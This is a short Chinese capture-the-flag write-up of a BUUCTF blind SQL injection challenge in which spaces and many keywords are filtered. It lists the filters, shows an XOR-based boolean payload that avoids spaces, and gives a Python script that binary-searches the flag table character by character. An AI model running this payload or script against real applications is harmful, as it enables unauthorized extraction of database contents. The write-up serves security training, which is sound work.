考点
盲注
bypass空格
题解
首先发现过滤了很多东西,union limit ord and xor information_schema - & # * ||
发现没有过滤 ^ ,尝试输入参数10返回正常,11返回错误
然后尝试进行注入,输入 0^(ascii(substr((select(database())),1,1))>0) 返回正常,这也说明存在注入。题目也说明flag在flag表的flag字段,写脚本爆破即可。
import requests
url = 'http://808a4f11-2371-4c63-a2f8-cc9d86102282.node3.buuoj.cn/index.php'
# 0^1返回 glzjin wants a girlfriend
# 0^0返回 false
flag = ''
for i in range(1, 50):
low = 32
high = 126
mid = (low+high)//2
print(flag)
while low < high:
payload = f"0^(ascii(substr((select(flag)from(flag)),{i},1))>{mid})"
# print(payload)
data = {
'id': payload
}
r = requests.post(url=url, data=data)
# print(r.text)
if 'glzjin wants a girlfriend' in r.text:
low = mid + 1
if 'Error' in r.text:
high = mid
mid = (low+high)//2
if low == high:
flag = flag + chr(low)
break